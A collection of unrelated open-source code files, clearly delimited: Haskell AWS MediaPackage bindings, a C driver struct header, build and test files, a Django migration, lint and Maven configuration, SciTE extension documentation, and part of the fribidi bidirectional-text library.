} deriving (Eq, Read, Show, Data, Typeable, Generic)
-- | Creates a value of 'OriginEndpoint' with the minimum fields required to make a request.
--
-- Use one of the following lenses to modify other fields as desired:
--
-- * 'oeWhitelist' - A list of source IP CIDR blocks that will be allowed to access the OriginEndpoint.
--
-- * 'oeHlsPackage' - Undocumented member.
--
-- * 'oeARN' - The Amazon Resource Name (ARN) assigned to the OriginEndpoint.
--
-- * 'oeManifestName' - A short string appended to the end of the OriginEndpoint URL.
--
-- * 'oeURL' - The URL of the packaged OriginEndpoint for consumption.
--
-- * 'oeChannelId' - The ID of the Channel the OriginEndpoint is associated with.
--
-- * 'oeStartoverWindowSeconds' - Maximum duration (seconds) of content to retain for startover playback. If not specified, startover playback will be disabled for the OriginEndpoint.
--
-- * 'oeDashPackage' - Undocumented member.
--
-- * 'oeMssPackage' - Undocumented member.
--
-- * 'oeId' - The ID of the OriginEndpoint.
--
-- * 'oeTimeDelaySeconds' - Amount of delay (seconds) to enforce on the playback of live content. If not specified, there will be no time delay in effect for the OriginEndpoint.
--
-- * 'oeCmafPackage' - Undocumented member.
--
-- * 'oeDescription' - A short text description of the OriginEndpoint.
originEndpoint
:: OriginEndpoint
originEndpoint =
OriginEndpoint'
{ _oeWhitelist = Nothing
, _oeHlsPackage = Nothing
, _oeARN = Nothing
, _oeManifestName = Nothing
, _oeURL = Nothing
, _oeChannelId = Nothing
, _oeStartoverWindowSeconds = Nothing
, _oeDashPackage = Nothing
, _oeMssPackage = Nothing
, _oeId = Nothing
, _oeTimeDelaySeconds = Nothing
, _oeCmafPackage = Nothing
, _oeDescription = Nothing
}
-- | A list of source IP CIDR blocks that will be allowed to access the OriginEndpoint.
oeWhitelist :: Lens' OriginEndpoint [Text]
oeWhitelist = lens _oeWhitelist (\ s a -> s{_oeWhitelist = a}) . _Default . _Coerce
-- | Undocumented member.
oeHlsPackage :: Lens' OriginEndpoint (Maybe HlsPackage)
oeHlsPackage = lens _oeHlsPackage (\ s a -> s{_oeHlsPackage = a})
-- | The Amazon Resource Name (ARN) assigned to the OriginEndpoint.
oeARN :: Lens' OriginEndpoint (Maybe Text)
oeARN = lens _oeARN (\ s a -> s{_oeARN = a})
-- | A short string appended to the end of the OriginEndpoint URL.
oeManifestName :: Lens' OriginEndpoint (Maybe Text)
oeManifestName = lens _oeManifestName (\ s a -> s{_oeManifestName = a})
-- | The URL of the packaged OriginEndpoint for consumption.
oeURL :: Lens' OriginEndpoint (Maybe Text)
oeURL = lens _oeURL (\ s a -> s{_oeURL = a})
-- | The ID of the Channel the OriginEndpoint is associated with.
oeChannelId :: Lens' OriginEndpoint (Maybe Text)
oeChannelId = lens _oeChannelId (\ s a -> s{_oeChannelId = a})
-- | Maximum duration (seconds) of content to retain for startover playback. If not specified, startover playback will be disabled for the OriginEndpoint.
oeStartoverWindowSeconds :: Lens' OriginEndpoint (Maybe Int)
oeStartoverWindowSeconds = lens _oeStartoverWindowSeconds (\ s a -> s{_oeStartoverWindowSeconds = a})
-- | Undocumented member.
oeDashPackage :: Lens' OriginEndpoint (Maybe DashPackage)
oeDashPackage = lens _oeDashPackage (\ s a -> s{_oeDashPackage = a})
-- | Undocumented member.
oeMssPackage :: Lens' OriginEndpoint (Maybe MssPackage)
oeMssPackage = lens _oeMssPackage (\ s a -> s{_oeMssPackage = a})
-- | The ID of the OriginEndpoint.
oeId :: Lens' OriginEndpoint (Maybe Text)
oeId = lens _oeId (\ s a -> s{_oeId = a})
-- | Amount of delay (seconds) to enforce on the playback of live content. If not specified, there will be no time delay in effect for the OriginEndpoint.
oeTimeDelaySeconds :: Lens' OriginEndpoint (Maybe Int)
oeTimeDelaySeconds = lens _oeTimeDelaySeconds (\ s a -> s{_oeTimeDelaySeconds = a})
-- | Undocumented member.
oeCmafPackage :: Lens' OriginEndpoint (Maybe CmafPackage)
oeCmafPackage = lens _oeCmafPackage (\ s a -> s{_oeCmafPackage = a})
-- | A short text description of the OriginEndpoint.
oeDescription :: Lens' OriginEndpoint (Maybe Text)
oeDescription = lens _oeDescription (\ s a -> s{_oeDescription = a})
instance FromJSON OriginEndpoint where
parseJSON
= withObject "OriginEndpoint"
(\ x ->
OriginEndpoint' <$>
(x .:? "whitelist" .!= mempty) <*>
(x .:? "hlsPackage")
<*> (x .:? "arn")
<*> (x .:? "manifestName")
<*> (x .:? "url")
<*> (x .:? "channelId")
<*> (x .:? "startoverWindowSeconds")
<*> (x .:? "dashPackage")
<*> (x .:? "mssPackage")
<*> (x .:? "id")
<*> (x .:? "timeDelaySeconds")
<*> (x .:? "cmafPackage")
<*> (x .:? "description"))
instance Hashable OriginEndpoint where
instance NFData OriginEndpoint where
-- | A configuration for accessing an external Secure Packager and Encoder Key Exchange (SPEKE) service that will provide encryption keys.
--
-- /See:/ 'spekeKeyProvider' smart constructor.
data SpekeKeyProvider = SpekeKeyProvider'
{ _skpURL :: !Text
, _skpResourceId :: !Text
, _skpRoleARN :: !Text
, _skpSystemIds :: ![Text]
} deriving (Eq, Read, Show, Data, Typeable, Generic)
-- | Creates a value of 'SpekeKeyProvider' with the minimum fields required to make a request.
--
-- Use one of the following lenses to modify other fields as desired:
--
-- * 'skpURL' - The URL of the external key provider service.
--
-- * 'skpResourceId' - The resource ID to include in key requests.
--
-- * 'skpRoleARN' - An Amazon Resource Name (ARN) of an IAM role that AWS Elemental MediaPackage will assume when accessing the key provider service.
--
-- * 'skpSystemIds' - The system IDs to include in key requests.
spekeKeyProvider
:: Text -- ^ 'skpURL'
-> Text -- ^ 'skpResourceId'
-> Text -- ^ 'skpRoleARN'
-> SpekeKeyProvider
spekeKeyProvider pURL_ pResourceId_ pRoleARN_ =
SpekeKeyProvider'
{ _skpURL = pURL_
, _skpResourceId = pResourceId_
, _skpRoleARN = pRoleARN_
, _skpSystemIds = mempty
}
-- | The URL of the external key provider service.
skpURL :: Lens' SpekeKeyProvider Text
skpURL = lens _skpURL (\ s a -> s{_skpURL = a})
-- | The resource ID to include in key requests.
skpResourceId :: Lens' SpekeKeyProvider Text
skpResourceId = lens _skpResourceId (\ s a -> s{_skpResourceId = a})
-- | An Amazon Resource Name (ARN) of an IAM role that AWS Elemental MediaPackage will assume when accessing the key provider service.
skpRoleARN :: Lens' SpekeKeyProvider Text
skpRoleARN = lens _skpRoleARN (\ s a -> s{_skpRoleARN = a})
-- | The system IDs to include in key requests.
skpSystemIds :: Lens' SpekeKeyProvider [Text]
skpSystemIds = lens _skpSystemIds (\ s a -> s{_skpSystemIds = a}) . _Coerce
instance FromJSON SpekeKeyProvider where
parseJSON
= withObject "SpekeKeyProvider"
(\ x ->
SpekeKeyProvider' <$>
(x .: "url") <*> (x .: "resourceId") <*>
(x .: "roleArn")
<*> (x .:? "systemIds" .!= mempty))
instance Hashable SpekeKeyProvider where
instance NFData SpekeKeyProvider where
instance ToJSON SpekeKeyProvider where
toJSON SpekeKeyProvider'{..}
= object
(catMaybes
[Just ("url" .= _skpURL),
Just ("resourceId" .= _skpResourceId),
Just ("roleArn" .= _skpRoleARN),
Just ("systemIds" .= _skpSystemIds)])
-- | A StreamSelection configuration.
--
-- /See:/ 'streamSelection' smart constructor.
data StreamSelection = StreamSelection'
{ _ssStreamOrder :: !(Maybe StreamOrder)
, _ssMinVideoBitsPerSecond :: !(Maybe Int)
, _ssMaxVideoBitsPerSecond :: !(Maybe Int)
} deriving (Eq, Read, Show, Data, Typeable, Generic)
-- | Creates a value of 'StreamSelection' with the minimum fields required to make a request.
--
-- Use one of the following lenses to modify other fields as desired:
--
-- * 'ssStreamOrder' - A directive that determines the order of streams in the output.
--
-- * 'ssMinVideoBitsPerSecond' - The minimum video bitrate (bps) to include in output.
--
-- * 'ssMaxVideoBitsPerSecond' - The maximum video bitrate (bps) to include in output.
streamSelection
:: StreamSelection
streamSelection =
StreamSelection'
{ _ssStreamOrder = Nothing
, _ssMinVideoBitsPerSecond = Nothing
, _ssMaxVideoBitsPerSecond = Nothing
}
-- | A directive that determines the order of streams in the output.
ssStreamOrder :: Lens' StreamSelection (Maybe StreamOrder)
ssStreamOrder = lens _ssStreamOrder (\ s a -> s{_ssStreamOrder = a})
-- | The minimum video bitrate (bps) to include in output.
ssMinVideoBitsPerSecond :: Lens' StreamSelection (Maybe Int)
ssMinVideoBitsPerSecond = lens _ssMinVideoBitsPerSecond (\ s a -> s{_ssMinVideoBitsPerSecond = a})
-- | The maximum video bitrate (bps) to include in output.
ssMaxVideoBitsPerSecond :: Lens' StreamSelection (Maybe Int)
ssMaxVideoBitsPerSecond = lens _ssMaxVideoBitsPerSecond (\ s a -> s{_ssMaxVideoBitsPerSecond = a})
instance FromJSON StreamSelection where
parseJSON
= withObject "StreamSelection"
(\ x ->
StreamSelection' <$>
(x .:? "streamOrder") <*>
(x .:? "minVideoBitsPerSecond")
<*> (x .:? "maxVideoBitsPerSecond"))
instance Hashable StreamSelection where
instance NFData StreamSelection where
instance ToJSON StreamSelection where
toJSON StreamSelection'{..}
= object
(catMaybes
[("streamOrder" .=) <$> _ssStreamOrder,
("minVideoBitsPerSecond" .=) <$>
_ssMinVideoBitsPerSecond,
("maxVideoBitsPerSecond" .=) <$>
_ssMaxVideoBitsPerSecond])
| {
"pile_set_name": "Github"
} |
typedef struct _DEVICE_EXTENSION
{
KEVENT kill;
PKTHREAD hThread;
} DEVICE_EXTENSION, *PDEVICE_EXTENSION;
typedef struct idtentry {
unsigned short OffsetLow;
unsigned short Selector;
unsigned char Reserved;
unsigned char Type:4;
unsigned char Always0:1;
unsigned char Dpl:2;
unsigned char Present:1;
unsigned short OffsetHigh;
} IdtEntry_t, *PIdtEntry_t;
| {
"pile_set_name": "Github"
} |
### TestComplex.mk -- A complex heat generating program
# Author: Michael Grünewald
# Date: Fri Nov 14 10:56:08 CET 2014
# BSD Owl Scripts (https://github.com/michipili/bsdowl)
# This file is part of BSD Owl Scripts
#
# Copyright © 2002–2016 Michael Grünewald. All Rights Reserved.
#
# This file must be used under the terms of the BSD license.
# This source file is licensed as described in the file LICENSE, which
# you should have received as part of this distribution.
TEST_DESCRIPTION= Complex C software made of two libraries and a program
TEST_SOURCEDIR= example/langc/heat
TEST_SEQUENCE= preparatives all install
TEST_MATRIX= CONFIGURATION
TEST_CONFIGURATION= Release
test-librational:
test -f ${DESTDIR}${LIBDIR}/librational.a
test -f ${DESTDIR}${INCLUDEDIR}/rational.h
test -f ${DESTDIR}${INCLUDEDIR}/rational_trace.h
test -f ${DESTDIR}${MANDIR}/man3/librational.3.gz
test-libfibonacci:
test -f ${DESTDIR}${LIBDIR}/libfibonacci.a
test -f ${DESTDIR}${INCLUDEDIR}/fibonacci.h
test -f ${DESTDIR}${MANDIR}/man3/libfibonacci.3.gz
test-goldenratio:
test -x ${DESTDIR}${BINDIR}/goldenratio
test-dist:
test -f ${PACKAGE}-${VERSION}.tar.gz
test -f ${PACKAGE}-${VERSION}.tar.gz.sig
test -f ${PACKAGE}-${VERSION}.tar.bz2
test -f ${PACKAGE}-${VERSION}.tar.bz2.sig
.if!(defined(.MAKE.OS)&&${.MAKE.OS} == Darwin)
test -f ${PACKAGE}-${VERSION}.tar.xz
test -f ${PACKAGE}-${VERSION}.tar.xz.sig
.endif
test: test-librational
test: test-libfibonacci
test: test-goldenratio
.if !empty(WITH_TESTSUITE_GPG:Myes)
test: test-dist
.endif
### End of file `TestComplex.mk'
| {
"pile_set_name": "Github"
} |
<?php
namespace Aws\Test\S3\Exception;
use Aws\Command;
use Aws\Exception\AwsException;
use Aws\S3\Exception\S3MultipartUploadException;
use Aws\Multipart\UploadState;
use GuzzleHttp\Psr7;
use PHPUnit\Framework\TestCase;
/**
* @covers Aws\S3\Exception\S3MultipartUploadException
*/
class S3MultipartUploadExceptionTest extends TestCase
{
public function testCanProviderFailedTransferFilePathInfo()
{
$state = new UploadState([]);
$failed = [
1 => new AwsException('Bad digest.', new Command('UploadPart', [
'Bucket' => 'foo',
'Key' => 'bar',
'Body' => Psr7\stream_for('Part 1'),
])),
5 => new AwsException('Missing header.', new Command('UploadPart', [
'Bucket' => 'foo',
'Key' => 'bar',
'Body' => Psr7\stream_for('Part 2'),
])),
8 => new AwsException('Needs more love.', new Command('UploadPart')),
];
$path = '/path/to/the/large/file/test.zip';
$exception = new S3MultipartUploadException($state, $failed, [
'file_name' => $path
]);
$this->assertEquals('foo', $exception->getBucket());
$this->assertEquals('bar', $exception->getKey());
$this->assertEquals('php://temp', $exception->getSourceFileName());
}
}
| {
"pile_set_name": "Github"
} |
# rename file to UTF-8 name in zip archive
return 0
args testfile rename 0 ÄÖÜßäöü
file testfile testfile.zip testfile-UTF8.zip
| {
"pile_set_name": "Github"
} |
# -*- coding: utf-8 -*-
# Generated by Django 1.9.4 on 2016-04-04 21:09
from __future__ import unicode_literals
import django.db.models.deletion
import django.utils.timezone
import jsonfield.fields
from django.db import migrations
from django.db import models
class Migration(migrations.Migration):
dependencies = [
('orchestra', '0024_auto_20160325_1916'),
]
operations = [
migrations.CreateModel(
name='Iteration',
fields=[
('id', models.AutoField(auto_created=True,
primary_key=True, serialize=False, verbose_name='ID')),
('start_datetime', models.DateTimeField(
default=django.utils.timezone.now)),
('end_datetime', models.DateTimeField(blank=True, null=True)),
('status', models.IntegerField(choices=[
(0, 'Processing'), (1, 'Requested Review'), (2, 'Provided Review')])),
('submitted_data', jsonfield.fields.JSONField(blank=True, default={})),
('assignment', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE,
related_name='iterations', to='orchestra.TaskAssignment')),
],
),
]
| {
"pile_set_name": "Github"
} |
<?xml version="1.0" encoding="UTF-8"?>
<!--
Copyright 2017 StreamSets Inc.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
-->
<project xmlns="http://maven.apache.org/POM/4.0.0"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd">
<modelVersion>4.0.0</modelVersion>
<parent>
<groupId>com.streamsets</groupId>
<artifactId>streamsets-datacollector-root-lib</artifactId>
<version>3.20.0-SNAPSHOT</version>
<relativePath>../root-lib</relativePath>
</parent>
<groupId>com.streamsets</groupId>
<artifactId>streamsets-datacollector-elasticsearch-protolib</artifactId>
<version>3.20.0-SNAPSHOT</version>
<description>StreamSets Data Collector Elastic Search ProtoLib</description>
<name>StreamSets Data Collector Elastic Search ProtoLib</name>
<packaging>jar</packaging>
<properties>
<elasticsearch.version>5.3.0</elasticsearch.version>
<gson.version>2.2.4</gson.version>
<log4j2.version>2.7</log4j2.version>
</properties>
<dependencies>
<!-- Test Dependencies -->
<dependency>
<groupId>com.fasterxml.jackson.core</groupId>
<artifactId>jackson-databind</artifactId>
<version>${jackson.version}</version>
<scope>test</scope>
</dependency>
<dependency>
<groupId>junit</groupId>
<artifactId>junit</artifactId>
<scope>test</scope>
</dependency>
<dependency>
<groupId>org.mockito</groupId>
<artifactId>mockito-core</artifactId>
<scope>test</scope>
</dependency>
<dependency>
<groupId>org.mock-server</groupId>
<artifactId>mockserver-netty</artifactId>
<version>${mockserver.version}</version>
<scope>test</scope>
</dependency>
<dependency>
<groupId>org.elasticsearch</groupId>
<artifactId>elasticsearch</artifactId>
<version>${elasticsearch.version}</version>
<scope>test</scope>
</dependency>
<dependency>
<groupId>org.awaitility</groupId>
<artifactId>awaitility</artifactId>
<version>${awaitility.version}</version>
</dependency>
<!-- Do not move this below commonlib dependency or wrong netty will be loaded for tests -->
<dependency>
<groupId>org.elasticsearch.plugin</groupId>
<artifactId>transport-netty4-client</artifactId>
<version>${elasticsearch.version}</version>
<scope>test</scope>
</dependency>
<!-- Provided Dependencies -->
<dependency>
<groupId>org.apache.logging.log4j</groupId>
<artifactId>log4j-api</artifactId>
<version>${log4j2.version}</version>
<scope>provided</scope>
</dependency>
<dependency>
<groupId>org.apache.logging.log4j</groupId>
<artifactId>log4j-core</artifactId>
<version>${log4j2.version}</version>
<scope>provided</scope>
</dependency>
<dependency>
<groupId>com.google.code.gson</groupId>
<version>${gson.version}</version>
<artifactId>gson</artifactId>
<scope>provided</scope>
</dependency>
<dependency>
<groupId>com.streamsets</groupId>
<artifactId>streamsets-datacollector-api</artifactId>
<scope>provided</scope>
</dependency>
<dependency>
<groupId>com.streamsets</groupId>
<artifactId>streamsets-datacollector-aws-support</artifactId>
<!-- version>${project.version}</version -->
</dependency>
<dependency>
<groupId>log4j</groupId>
<artifactId>log4j</artifactId>
<scope>provided</scope>
</dependency>
<dependency>
<groupId>org.slf4j</groupId>
<artifactId>slf4j-api</artifactId>
<scope>provided</scope>
</dependency>
<dependency>
<groupId>org.slf4j</groupId>
<artifactId>slf4j-log4j12</artifactId>
<scope>provided</scope>
</dependency>
<dependency>
<groupId>io.dropwizard.metrics</groupId>
<artifactId>metrics-core</artifactId>
<scope>provided</scope>
</dependency>
<dependency>
<groupId>com.streamsets</groupId>
<artifactId>streamsets-datacollector-sdk</artifactId>
<scope>provided</scope>
</dependency>
<!-- Compile Dependencies -->
<dependency>
<groupId>org.elasticsearch.client</groupId>
<artifactId>rest</artifactId>
<version>${elasticsearch.version}</version>
</dependency>
<dependency>
<groupId>org.elasticsearch.client</groupId>
<artifactId>sniffer</artifactId>
<version>${elasticsearch.version}</version>
</dependency>
<dependency>
<groupId>com.streamsets</groupId>
<artifactId>streamsets-datacollector-common</artifactId>
<scope>compile</scope>
<exclusions>
<exclusion>
<groupId>commons-io</groupId>
<artifactId>commons-io</artifactId>
</exclusion>
</exclusions>
</dependency>
<dependency>
<groupId>com.streamsets</groupId>
<artifactId>streamsets-datacollector-commonlib</artifactId>
<scope>compile</scope>
</dependency>
<dependency>
<groupId>com.streamsets</groupId>
<artifactId>streamsets-datacollector-commonlib</artifactId>
<type>test-jar</type>
<scope>test</scope>
</dependency>
<dependency>
<groupId>com.streamsets</groupId>
<artifactId>streamsets-datacollector-stagesupport</artifactId>
<type>test-jar</type>
<scope>test</scope>
</dependency>
</dependencies>
<build>
<plugins>
<plugin>
<groupId>org.apache.maven.plugins</groupId>
<artifactId>maven-deploy-plugin</artifactId>
<version>2.8.2</version>
<configuration>
<skip>true</skip>
</configuration>
</plugin>
<!-- create test jar -->
<plugin>
<groupId>org.apache.maven.plugins</groupId>
<artifactId>maven-jar-plugin</artifactId>
<executions>
<execution>
<goals>
<goal>test-jar</goal>
</goals>
</execution>
</executions>
</plugin>
</plugins>
</build>
</project>
| {
"pile_set_name": "Github"
} |
/*
* Copyright 2013-2020 the original author or authors.
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* https://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
import org.springframework.cloud.contract.spec.Contract
Contract.make {
request {
method(GET())
url("/foo13")
}
response {
status(200)
}
}
| {
"pile_set_name": "Github"
} |
{
"extends": [ "tslint-angular", "tslint-config-standard" ],
"rules": {
"deprecation": {
"severity": "warning"
},
"no-inferrable-types": true,
"eofline": true,
"max-line-length": [true, 140],
"no-floating-promises": false, // Memory issues
"await-promise": [true, "PromiseLike"],
"member-ordering": [true, {
"order": [
"public-static-field",
"private-static-field",
"public-instance-field",
"private-instance-field",
"public-constructor",
"private-constructor",
"public-instance-method",
"protected-instance-method",
"private-instance-method"
]}
],
"variable-name": [
true,
"ban-keywords",
"check-format",
"allow-leading-underscore",
"allow-pascal-case",
"allow-trailing-underscore"
],
"no-shadowed-variable": false,
"no-bitwise": false,
"max-classes-per-file": false,
"interface-over-type-literal": false
}
}
| {
"pile_set_name": "Github"
} |
<?xml version="1.0"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="generator" content="SciTE" />
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<title>
SciTE Extension Interface
</title>
<style type="text/css">
.example {
color: #00A000;
font-weight: bold;
}
DIV.example {
background: #F7FCF7;
border: 1px solid #C0D7C0;
margin: 0.3em 3em;
padding: 0.3em 0.6em;
font-size: 80%;
}
</style>
</head>
<body bgcolor="#FFFFFF" text="#000000">
<table bgcolor="#000000" width="100%" cellspacing="0" cellpadding="0" border="0">
<tr>
<td>
<img src="SciTEIco.png" border="3" height="64" width="64" alt="Scintilla icon" />
</td>
<td>
<a href="index.html" style="color:white;text-decoration:none"><font size="5">
SciTE Extension Interface</font></a>
</td>
</tr>
</table>
<h3>
Purpose.
</h3>
<p>Some people want to create enhanced versions of the SciTE editor, while
still receiving the benefits of new SciTE features. This could be for an
editor designed for a particular environment such as developing games,
to incorporate a scripting capability within SciTE or to allow SciTE to be
controlled by another process through an IPC mechanism.</p>
<p>There are two example extensions.
The <a href="SciTEDirector.html">SciTE Director Interface</a> allows
SciTE on Windows to be controlled by an external application such as a
project manager.
The <a href="SciTELua.html">SciTE Lua Scripting Extension</a> is an
integration of the Lua scripting language into SciTE, done using the Extension
interface.</p>
<h3>
Extension Interface.
</h3>
<div class="example">
bool Initialise(ExtensionAPI *host_);<br />
bool Finalise();<br />
bool Clear();<br />
bool Load(const char *filename);<br />
bool InitBuffer(int index);<br />
bool ActivateBuffer(int index);<br />
bool RemoveBuffer(int index);<br />
bool OnOpen(const char *path);<br />
bool OnSwitchFile(const char *path);<br />
bool OnBeforeSave(const char *path);<br />
bool OnSave(const char *path);<br />
bool OnChar(char ch);<br />
bool OnExecute(const char *s);<br />
bool OnSavePointReached();<br />
bool OnSavePointLeft();<br />
bool OnStyle(unsigned int, int, int, Accessor *);<br />
bool OnDoubleClick();<br />
bool OnUpdateUI();<br />
bool OnMarginClick();<br />
bool OnMacro(const char *, const char *);<br />
bool SendProperty(const char *);<br />
bool OnKey(int keyval, int modifiers);<br />
bool OnDwellStart(int pos, const char *word);<br />
bool OnClose(const char *filename);<br />
</div>
<p>An extension must implement the Extension interface defined in scite/src/Extender.h
Only the first 4 methods must be implemented although an implementation can be as
simple as just returning false. The other methods have empty default implementations.
Methods added to this interface in the future should have default implementations so
existing extensions will continue to compile.</p>
<p>Each method returns a bool indicating whether the method handled all processing that
is needed and so no additional processing is required. Normally, false is returned to indicate
that further processing may be done.</p>
<p>The extension should use the Initialise and Finalise methods to allocate
and deallocate resources. The ExtensionAPI pointer should be saved in the
Initialise method so the extension can communicate back to SciTE.</p>
<p>The Clear and Load methods are used to support extensions that need
to load a resource such as a script file when a file is opened. When a file is
opened in SciTE, first the extension is asked to clear any data associated with
the previous file through Clear. Then SciTE checks for a property called
"extension" which matches the file name, so for x.cpp, looks for extension.*.cpp.
A file with this name is searched for in standard property file locations and if found
Load is called with the path as an argument.</p>
<p>The InitBuffer, ActivateBuffer, and RemoveBuffer methods provide the necessary hooks
so that extensions have a mechanism to associate data with a specific buffer, similar
to the way SciTE itself remembers the monospace setting of each buffer. InitBuffer is
called whenever a new document is opened in a given buffer. The buffer might be a newly
allocated one, or it might be recycled if the maximum number of buffers has been reached.
Once the buffer has been initialized, it will be the active buffer. Thereafter,
ActivateBuffer is called whenever the user switches to another loaded buffer.
RemoveBuffer is called when an existing buffer is closed. Thereafter, the indexes of
the buffers that come after the removed buffer are shifted down by one. After
RemoveBuffer, the extension will receive an InitBuffer or ActivateBuffer to establish
the new active buffer.</p>
<p>OnExecute is called only when an extension command is executed. These are
indicated in properties as subsystem 3.</p>
<p>OnBeforeSave is called before saving the file and an extension may implement
file saving itself and return true to prevent the default file save code from executing.</p>
<p>Other methods are called upon events occurring in SciTE allowing an extension
to respond to those events.</p>
<h3>
ExtensionAPI Interface.
</h3>
<div class="example">
enum Pane { paneEditor=1, paneOutput=2, paneFindOutput=3 };<br />
sptr_t Send(Pane p, unsigned int msg, uptr_t wParam=0, sptr_t lParam=0);<br />
char *Range(Pane p, int start, int end);<br />
void Remove(Pane p, int start, int end);<br />
void Insert(Pane p, int pos, const char *s);<br />
void Trace(const char *s);<br />
char *Property(const char *key);<br />
void SetProperty(const char *key, const char *val);<br />
uptr_t GetInstance();<br />
void ShutDown();<br />
void Perform(const char *actions);<br />
void DoMenuCommand(int cmdID);<br />
void UpdateStatusBar(bool bUpdateSlowData);<br />
</div>
<p>An extension can call back into SciTE using this interface which is a simplified
way to access the functionality of SciTE.</p>
<p>As well as the normal editor pane and output pane, this interface allows for
a future feature where a third pane may be used for the output of search
commands. This is currently mapped to the output pane.</p>
<p>Send allows sending messages to the Scintilla control contained in each pane.</p>
<p>Range retrieves text from the pane. This must be deleted with delete[].
Remove and Insert are used to remove and insert text in a pane.</p>
<p>Trace displays a string at the end of the output pane.</p>
<p>SciTE's properties can be read and written with Property and
SetProperty. The result from Property should be deleted with delete[].</p>
<p>GetInstance is Windows specific and returns the HINSTANCE of
the application which is needed when accessing platform facilities.</p>
<p>ShutDown is equivalent to the user choosing the Quit menu item.
If there are any unsaved files loaded, then the user is asked whether to save them
and may cancel from this dialog. So under some circumstances, the application will
continue to run after ShutDown is called.</p>
<p>Perform takes a string containing an action, a ':' character, and an argument.
Currently the only known action is open and then the argument is a path.
This is used by the <a href="SciTEDirector.html">Director extension</a>
to relay commands from another application.
In the future more actions will be possible through this method.</p>
<h3>
Attaching the extension.
</h3>
<p>Extensions are currently added explicitly by code in the start up function.
On Windows, the DirectorExtension is attached with code similar to this simplified
example:</p>
<div class="example">
DirectorExtension director;<br />
Extension *extender = &director;<br />
//...<br />
SciTEWin MainWind(extender);
</div>
<p>It would be better to move to an implicit attachment mechanism similar to the
way lexers are attached to Scintilla, determining which extensions are used
by simply linking their object files into SciTE. It would also be good to
allow run-time attachment of extensions housed in DLLs or shared object libraries.</p>
<h3>
Multiplexing.
</h3>
<p>SciTE supports multiple extensions at a time. A multiplexer extension
maintains a list of extensions and calls each in turn for each method. Once an extension
returns true indicating processing should stop, the multiplexer returns without traversing
any remaining list members. However, for some methods such as Initialise and Finalise,
the remaining extensions are traversed regardless of the return value of the previous
extension.</p>
<h3>
Thread safety.
</h3>
<p>In general, SciTE is a single threaded application. However, on Windows, command
tools call OnExecute from a separate worker thread. The SingleThreadExtension adapter
class can be used to wrap an extension so that OnExecute calls are marshalled to the
main thread. Of course, this is not necessary if your extension is thread safe, or
if it does not implement OnExecute, or if it is a GTK-specific extension.
</body>
</html>
| {
"pile_set_name": "Github"
} |
/* FriBidi
* fribidi.c - Unicode bidirectional and Arabic joining/shaping algorithms
*
* Authors:
* Behdad Esfahbod, 2001, 2002, 2004
* Dov Grobgeld, 1999, 2000
*
* Copyright (C) 2004 Sharif FarsiWeb, Inc
* Copyright (C) 2001,2002 Behdad Esfahbod
* Copyright (C) 1999,2000 Dov Grobgeld
*
* This library is free software; you can redistribute it and/or
* modify it under the terms of the GNU Lesser General Public
* License as published by the Free Software Foundation; either
* version 2.1 of the License, or (at your option) any later version.
*
* This library is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
* Lesser General Public License for more details.
*
* You should have received a copy of the GNU Lesser General Public License
* along with this library, in a file named COPYING; if not, write to the
* Free Software Foundation, Inc., 51 Franklin Street, Fifth Floor,
* Boston, MA 02110-1301, USA
*
* For licensing issues, contact <[email protected]>.
*/
#include "common.h"
#include <fribidi.h>
#ifdef DEBUG
static int flag_debug = false;
#endif
FRIBIDI_ENTRY fribidi_boolean
fribidi_debug_status (
void
)
{
#ifdef DEBUG
return flag_debug;
#else
return false;
#endif
}
FRIBIDI_ENTRY fribidi_boolean
fribidi_set_debug (
/* input */
fribidi_boolean state
)
{
#ifdef DEBUG
return flag_debug = state;
#else
return false;
#endif
}
FRIBIDI_ENTRY FriBidiStrIndex
fribidi_remove_bidi_marks (
FriBidiChar *str,
const FriBidiStrIndex len,
FriBidiStrIndex *positions_to_this,
FriBidiStrIndex *position_from_this_list,
FriBidiLevel *embedding_levels
)
{
register FriBidiStrIndex i, j = 0;
fribidi_boolean private_from_this = false;
fribidi_boolean status = false;
if UNLIKELY
(len == 0)
{
status = true;
goto out;
}
DBG ("in fribidi_remove_bidi_marks");
fribidi_assert (str);
/* If to_this is not NULL, we must have from_this as well. If it is
not given by the caller, we have to make a private instance of it. */
if (positions_to_this && !position_from_this_list)
{
position_from_this_list = fribidi_malloc (sizeof
(position_from_this_list[0]) *
len);
if UNLIKELY
(!position_from_this_list) goto out;
private_from_this = true;
for (i = 0; i < len; i++)
position_from_this_list[positions_to_this[i]] = i;
}
for (i = 0; i < len; i++)
if (!FRIBIDI_IS_EXPLICIT_OR_BN (fribidi_get_bidi_type (str[i]))
&& !FRIBIDI_IS_ISOLATE (fribidi_get_bidi_type (str[i]))
&& str[i] != FRIBIDI_CHAR_LRM && str[i] != FRIBIDI_CHAR_RLM)
{
str[j] = str[i];
if (embedding_levels)
embedding_levels[j] = embedding_levels[i];
if (position_from_this_list)
position_from_this_list[j] = position_from_this_list[i];
j++;
}
/* Convert the from_this list to to_this */
if (positions_to_this)
{
for (i = 0; i < len; i++)
positions_to_this[i] = -1;
for (i = 0; i < len; i++)
positions_to_this[position_from_this_list[i]] = i;
}
status = true;
out:
if (private_from_this)
fribidi_free (position_from_this_list);
